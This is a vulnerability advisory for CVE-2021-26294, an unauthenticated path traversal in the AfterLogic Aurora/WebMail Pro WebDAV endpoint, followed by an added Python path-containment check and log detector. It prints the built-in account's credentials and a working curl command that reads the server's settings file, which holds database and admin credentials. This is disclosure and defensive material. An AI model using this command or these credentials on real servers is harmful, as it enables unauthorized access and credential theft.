CVE-2021-26294 - Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint
Base Score: 7.5 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Directory Traversal, Public Built-in Credentials For Critical Function
https://owasp.org/www-community/attacks/Path_Traversal
- Emre KELEŞ - @emrekeles on Twitter
- Emircan YILDIZ - @scorpsec on Twitter
- Halil Emre ÖZEN - @halilemreozen on Twitter
AfterLogic Aurora and WebMail Pro version 7.7.9 and all lower versions are affected by this vulnerability. Simply sending an HTTP GET request to the WebDAV endpoint with the built-in account “caldav_public_user@localhost” and its predefined password “caldav_public_user” allows the attacker to read any file under the web root.
Any file can be read with the following curl command:
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
The sample curl command retrieves the license key, database credentials, admin panel credentials, etc.
- dav\server.php (handles the request and creates the \afterlogic\DAV\Server instance)
- \libraries\Sabre\DAV\server.php -> exec (passes the request method and URI to invokeMethod)
- \libraries\Sabre\DAV\server.php -> invokeMethod
- \libraries\Sabre\DAV\server.php -> httpGet
The directory traversal problem starts at step 2 (exec): it does not sanitize the given parameters or check the file extension. Combined with the httpGet business logic (reading the file content and returning it), this lets the attacker read any file under the web root.
Because of the above problem, any user who can log in can read configuration files. With the caldav_public_user@localhost account, attackers do not need any user information because it has a predefined password, so the vulnerability becomes exploitable by anyone without authentication.
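As an added, defender-side example (not part of the advisory and not AfterLogic's code), the Python below does two things: it implements the path-containment check that the exec/httpGet chain described above lacks (percent-decode, normalize, confirm the result is still under the served root), and it runs that check as a detector over a few constructed web-server access-log lines, one of which carries the advisory's request path. The log format, the IP addresses, the `alice@example.test` account and the assumption that the public CalDAV account has no legitimate business under the files tree are all mine; only `caldav_public_user@localhost` and the `/dav/server.php/files/personal/...` path come from the advisory.

```python
"""Containment check and access-log detector for CVE-2021-26294-style
WebDAV path traversal.  Added example; not the advisory's or vendor's code."""
import posixpath
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote

FILES_ROOT = "/files/personal"                      # served root, from the advisory's URL
BUILTIN_ACCOUNT = "caldav_public_user@localhost"    # built-in account named in the advisory


def resolve_dav_path(request_path: str, root: str = FILES_ROOT) -> Optional[str]:
    """Return the normalized path if it stays under `root`, else None.

    This is the check a WebDAV file handler should perform before opening
    anything: decode percent-encoding (repeatedly, so multiply-encoded input is
    normalized the same way), collapse '//', '.' and '..', then require the
    result to be the root itself or a descendant of it.
    """
    decoded = request_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    normalized = posixpath.normpath(decoded)        # '..' above '/' is dropped, '//' collapsed
    root_norm = posixpath.normpath(root)
    # The trailing '/' stops '/files/personalX' from passing as under '/files/personal'.
    if normalized == root_norm or normalized.startswith(root_norm + "/"):
        return normalized
    return None


# Common Log Format with the authenticated (HTTP Basic) user in the third field.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def flag_dav_requests(lines: Iterable[str], dav_prefix: str = "/dav/server.php",
                      root: str = FILES_ROOT) -> List[Tuple[str, str, List[str]]]:
    """Scan access-log lines and return (ip, user, reasons) for suspicious DAV requests.

    Indicators (either one flags the line):
      - 'traversal':       the file path under the DAV endpoint escapes `root`;
      - 'builtin-account': the built-in public CalDAV account touches the files tree
                           (assumption: that account has no business outside calendars).
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if not path.startswith(dav_prefix):
            continue
        file_path = path[len(dav_prefix):]
        in_files_tree = file_path.startswith(root)
        reasons = []
        if in_files_tree and resolve_dav_path(file_path, root) is None:
            reasons.append("traversal")
        if in_files_tree and m["user"] == BUILTIN_ACCOUNT:
            reasons.append("builtin-account")
        if reasons:
            hits.append((m["ip"], m["user"], reasons))
    return hits


# Constructed sample log: one line with the advisory's traversal path, three benign ones.
SAMPLE_LOG = [
    '203.0.113.7 - caldav_public_user@localhost [04/Feb/2021:10:15:01 +0000] '
    '"GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 200 4821',
    '198.51.100.23 - alice@example.test [04/Feb/2021:10:15:09 +0000] '
    '"GET /dav/server.php/files/personal/reports/q1.pdf HTTP/1.1" 200 10231',
    '198.51.100.23 - alice@example.test [04/Feb/2021:10:16:42 +0000] '
    '"PROPFIND /dav/server.php/calendars/alice/ HTTP/1.1" 207 1311',
    '203.0.113.7 - caldav_public_user@localhost [04/Feb/2021:10:17:30 +0000] '
    '"PROPFIND /dav/server.php/calendars/public/ HTTP/1.1" 207 902',
]

if __name__ == "__main__":
    for ip, user, reasons in flag_dav_requests(SAMPLE_LOG):
        print(f"{ip} {user} {','.join(reasons)}")
```

Only the first sample line is flagged, for both reasons; the built-in account's own calendar PROPFIND is left alone, which keeps the rule usable on a server that legitimately serves public calendars. The `resolve_dav_path` check is the shape of fix the vulnerable exec step needed, and the status code in the matched line tells the responder whether the read actually succeeded.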